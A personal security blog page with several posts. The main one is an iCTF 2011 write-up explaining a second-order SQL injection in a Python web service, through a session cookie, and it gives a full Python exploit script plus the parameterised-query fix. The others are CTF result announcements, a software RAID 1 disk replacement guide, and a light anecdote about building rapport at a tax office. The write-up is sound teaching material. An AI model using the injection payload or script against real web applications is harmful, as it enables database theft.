Sqall Blog

I know. It's a little bit late. But our team have to write these write ups for the ictf2011 organizers and I wrote it today for the sendalert service.

The service sendalert was a python webservice running on port 11111 which does …ahm ... seriously I don't know. The service got a login form and the game server constantly created new users. It uses a sqlite database which was located under “/home/sendalert/database”. The gameserver saved the flags in this database in the table “users” in the column “data”. The program used prepared sql statements for all but one query. This query was vulnerable for a sql injection. The python code for this query was in the “status” section:

cur.execute("""select username, data from users where session='%s'""" % session)

The problem with this query was, that the same session have to be saved in the database before you can use it to exploit the service. So first of all we need a registered user. When we register a user we can see in the python code that the service will give us the fix session “-”.

session = "-"
cur.execute("""insert into users (username, password, session) values (?,?,?);""", (username, password, session))

Now we have to find a way to change this session value. The only update query that alters the session lies in the depth of the login mechanism.

session = self.auth()
if session == None or session == "" or session == "-" or session == "None":
cookie = self.headers.getheaders('Cookie')
if cookie != None and len(cookie) != 0:
session = None
morsels = cookie[0].split(";");
self.logger.debug("Parsed cookie: %s" % str(morsels))
for m in morsels:
(var, val) = m.strip().split('=')
if var == self.cookie_name:
session = val
break;
else:
self.logger.debug("Session is missing, creating one (%s)" % str(session))
md5 = hashlib.md5()
md5.update(str(time.time()) + username + password + self.secret)
session = md5.hexdigest()
[...]
cur.execute("""update users set session=? where username=? and password=?""", (session, username, password))

Here we can see that if we log in with a valid user-password pair the service will read the “Cookie” value from our request and if it is set, it will change the session in the database to this value. If it is not set, a md5 hash will be generated for the session. The only thing we have to circumvent is the split for “=”.

So finally we create a user and log in. Before we log in we set our “Cookie” value to:

alertsession=' or 1<>2 order by data desc ---

(“alertsession=” is used by the service as a prefix in every session). Now we have changed our session value in the database to

alertsession=' or 1<>2 order by data desc ---

and we can exploit the service.

When we now request the page “status” from the web server with our cookie we inject the sql query mentioned in the beginning of this write up. The query will look like

select username, data from users where session='alertsession=' or 1<>2 order by data desc ---'

and finally we got the newest flag written on the web site.

A python script that will do all the magic for us looks like:

#!/usr/bin/python

import httplib
import urllib
import sys

ip = sys.argv[1]

#http://10.13.187.3:11111/status
host = "%s:11111" % ip
cookie = "alertsession=' or 1<>2 order by data desc ---"

try:
#username=fluxfingers&password=fluxfingersRules&submit=Register
params = urllib.urlencode({'username': 'fluxfingers', 'password': 'fluxfingersRules', 'submit': 'Register'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(host)
conn.request("POST", "/register", params, headers)
response = conn.getresponse()

params = urllib.urlencode({'username': 'fluxfingers', 'password': 'fluxfingersRules', 'submit': 'Login'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "Cookie": cookie}
conn = httplib.HTTPConnection(host)
conn.request("POST", "/login", params, headers)
response = conn.getresponse()

headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "Cookie": cookie}
params = ""
conn = httplib.HTTPConnection(host)
conn.request("GET", "/status", params, headers)
response = conn.getresponse()
data = response.read()
except:
sys.exit(0)

positionstart = data.find("Subject: ")
positionend = data.find("

",positionstart)
print data[positionstart+9:positionend]

conn.close()

To fix this issue you just have to change the line

cur.execute("""select username, data from users where session='%s'""" % session)

to

cur.execute("""select username, data from users where session=?""" , (session, ))

Now it uses prepared statements like the other queries.

Yesterday my team and I made the 3rd place at the iCTF 2011. This time it was a real complicated CTF about money laundry, with really complicated rules. In the week before the ctf starts, some of us worked real hard to code a riskmanager program, that will decide how to use the flags and submit it. Until 4h before the ctf ends, it didn't work and we were on places around 40th. But finally we ended up on the 3rd place




Congrats More Smoked Leet Chicken (2nd) and We_0wn_Y0u (1st). Thanks to the iCTF team for this (sometimes really frustrating) ctf.



And last but not least, our thanks goes to the US government, which makes this ctf the first ctf with healthy meal

Yesterday my team and I participate in the RuCTFE 2011. We made the 2nd place (like last year). Congrats to 0ldEur0pe that made the 1st place (also like last year). It was frustrating to see how 0ldEur0pe slowly but steady caught us up in the end of the CTF



Thanks goes to the RuCTFE team that made again a very good CTF (RuCTFE is always one of my favorites and I can't wait to RuCTFE 2012 ). It was a lot of fun and once again we learned a lot. Thank you!

Today another type of data security.

One day ago a HDD failed in my software RAID 1 system. Today I replaced it and here is a quick guide for doing it:

1. locating defect HDD:

okean0s:/home/sqall# cat /proc/mdstat
md1 : active raid1 sda[0] sdb[2](F)
244198464 blocks [2/1] [U_]

---

2. getting serial number:

okean0s:/home/sqall# smartctl -i /dev/sdb
smartctl 5.40 2010-07-12 r3124 [x86_64-unknown-linux-gnu] (local build)
Copyright (C) 2002-10 by Bruce Allen, http://smartmontools.sourceforge.net

=== START OF INFORMATION SECTION ===
Model Family: Seagate Barracuda 7200.10 family
Device Model: ST3250620A
Serial Number: xxxxxxxx
Firmware Version: 3.AAE
User Capacity: 250,059,350,016 bytes
Device is: In smartctl database [for details use: -P show]
ATA Version is: 7
ATA Standard is: Exact ATA specification draft version not indicated
Local Time is: Thu Oct 20 21:25:40 2011 CEST
SMART support is: Available - device has SMART capability.
SMART support is: Enabled

---

3. fail the HDD in RAID Array:

okean0s:/home/sqall# mdadm --manage /dev/md1 --fail /dev/sdb

---

4. remove the HDD from RAID Array:

okean0s:/home/sqall# mdadm --manage /dev/md1 --remove /dev/sdb

---

5. now shutdown the server and physical remove the HDD and replace it with a new HDD

---

6. add HDD to the RAID Array:

okean0s:/mnt# mdadm --manage /dev/md1 --add /dev/sdb

---

7. verify state:

okean0s:/mnt# cat /proc/mdstat
Personalities : [raid1] [raid6] [raid5] [raid4]
md1 : active raid1 sdb[2] sda[0]
244198464 blocks [2/1] [U_]
[>....................] recovery = 0.2% (673344/244198464) finish=90.4min speed=44889K/sec

I found this guide on the web (it's exactly the same as my quick guide) and the author has partitions on the HDDs. So here I like to quote him:

Adding the new disk to the RAID Array:
Now that the new hard drive has been physically installed we can add it to the RAID Array.
In order to use the new drive we must create the exact same partition table structure that was on the old drive.
We can use the existing drive and mirror its partition table structure to the new drive. There is an easy command to do this:

sfdisk -d /dev/sda | sfdisk /dev/sdb

* Note that sometimes when removing drives and replacing them the drives device name may change. Make sure the drive you replaced is listed as /dev/sdb, by issueing command "fdisk -l /dev/sdb" and no partitions exist.

Last Friday I had my next practical social engineering event. But before I start here a short info why it came to this situation.

I worked for three years as a sysadmin at an university in the german state NRW. Therefore I was paid by the LBV ("Landesamt für Besoldung und Versorgung") like every employee for the state NRW. And everyone I know who is paid by the LBV has a story in which they had problems with an incompetent LBV employee. Perhaps it's not always the employee, just the bureaucracy, but EVERYONE who has something to do with the LBV knows what I mean. Now I study IT-security at another university in NRW and got an offer for an sysadmin job at this university. Well, studying is expensive and so I take this job. When I quit my old job a year ago, the LBV didn't send me all my documents back I now needed for the new job (the important one was a document for the taxes). Now a logical mind would say: "Hey, the LBV has the documents from your old job, why can't they use these documents for the new one?". Well, I said something like that. But the truth is, they must send me the documents back and my new employer will send them back to the LBV. And the problem is: the LBV works very slow and the time is short in this case.

Therefore I was on my way to the tax office to get a replacement for the document for the taxes. After I was in two offices talking to some very impolite employees about my problem I went to the third and last one. I was a little bit angry for this impoliteness and thought about how I can handle the next employee without getting this rude behavior. I thought about "killing them with kindness" (a very easy and cool method my girlfriend mastered... really, she is a master in manipulate others with her kindness. She does it unconsciously, but she does.) but I tried this at the two employees before and it doesn't work well for me (it seems like every employee at an office that is run by the state hates their jobs). I thought about: "How can I get the employee in the last office put himself in my position?". And the solution was very simple and very effective. The solution (and the problem ) was the LBV.

So I told the employee (it was a middle-aged woman) about my problem and at the end I added: "... but you know the LBV. I think you had problems with the LBV yourself.". She starts to smile and I know I got her. She told me some stories about her and the LBV and I told her some of my stories. From here, it took only 2 minutes and I had the replacement for the document.

So what do we learn here?

First of all: "Never underestimate the effect of the kindness of your girlfriend"
Second: "State Offices suck!"
And the last one: "Kindness and to get the other put her/himself in your position will work for your benefits"